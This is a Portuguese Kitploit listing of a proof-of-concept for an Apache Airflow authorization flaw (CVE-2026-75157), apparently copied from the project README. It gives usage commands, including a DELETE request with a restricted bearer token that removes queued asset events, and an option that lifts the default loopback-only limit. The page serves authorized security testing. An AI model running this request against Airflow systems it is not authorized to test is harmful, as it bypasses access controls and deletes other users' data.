Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-75157-poc — PoC HTTP universal autorizado e independente para CVE-2026-75157 | Kitploit
Ferramentas/GitHubGitHub/licitrasimone/cve-2026-75157-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Segurança de APIsSegurança WebTestes de Penetração
GitHublicitrasimone/cve-2026-75157-poc

cve-2026-75157-poc

PoC HTTP universal autorizado e independente para CVE-2026-75157

Ver Repositório
há 7h 41mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-75157 PoC

PoC de pesquisa de segurança autorizada para a falha de autorização de eventos em fila do Apache Airflow em versões anteriores à 3.3.2.

Escopo

Execute apenas contra uma instância do Airflow que você possui ou está explicitamente autorizado a testar. O executor padrão recusa alvos que não sejam loopback. Este repositório não contém lógica de varredura, enumeração de alvos, persistência, roubo de credenciais ou payload destrutivo.

Arquivos

root@kitploit:~
README.md
poc.py

poc.py é um executor universal de requisições HTTP ciente do alvo. Ele aceita a URL de destino, método, caminho, cabeçalhos, corpo, fonte de autenticação e resultado esperado a partir da linha de comando, em vez de codificar um host fixo.

Uso

Verificação de integridade contra um laboratório Airflow local:

root@kitploit:~
python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/monitor/health \
  --method GET \
  --expect-status 200 \
  --expect-body healthy

Acionamento da CVE contra uma instância Airflow vulnerável local já preparada:

root@kitploit:~
export AIRFLOW_POC_TOKEN='lab-only-restricted-token'
python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/dags/cve_2026_75157_poc_dag/assets/queuedEvents \
  --method DELETE \
  --bearer-env AIRFLOW_POC_TOKEN \
  --expect-status 204

O token deve pertencer a um principal descartável com acesso de leitura a DAG e acesso de exclusão a Assets. O comportamento vulnerável esperado é que o principal restrito consiga excluir o evento em fila. O Airflow 3.3.2 ou posterior deve rejeitar a mesma requisição, a menos que o principal também tenha acesso de edição a DAG.

Opções

root@kitploit:~
--target URL              Alvo HTTP(S) absoluto obrigatório
--path PATH               Caminho opcional concatenado a --target
--method METHOD           GET, POST, PUT, PATCH, DELETE, HEAD
--header 'Name: Value'    Cabeçalho de requisição repetível
--bearer-env ENV          Lê um token bearer de ENV sem imprimi-lo
--json JSON               Corpo da requisição em JSON
--body-file FILE          Corpo bruto da requisição
--expect-status STATUS    Asserção de status esperado repetível
--expect-body TEXT        Asserção de corpo de resposta repetível
--timeout SECONDS
--no-follow-redirect
--allow-non-loopback      Opt-in explícito para um alvo autorizado que não seja de laboratório

O executor retorna código de saída 0 para uma asserção aprovada, 1 para erros de escopo/transporte/argumento e 2 para uma falha de asserção HTTP. Valores de autorização e cookie são redigidos na saída.

Contexto da vulnerabilidade

Antes do Airflow 3.3.2, as rotas DELETE de eventos em fila verificavam o eixo DAG com permissão de leitura em vez de permissão de edição. A correção altera o requisito de autorização de DAG para a permissão de nível de escrita. Este PoC envia a requisição HTTP real; ele não cria o usuário de laboratório nem o fixture de banco de dados.

Referências

  • https://www.openwall.com/lists/oss-security/2026/09/18/1
  • https://github.com/apache/airflow/pull/71736
  • https://airflow.apache.org/docs/apache-airflow/3.3.1/howto/docker-compose/index.html
  • https://airflow.apache.org/docs/apache-airflow-providers-fab/stable/auth-manager/access-control.html
Baixar ferramenta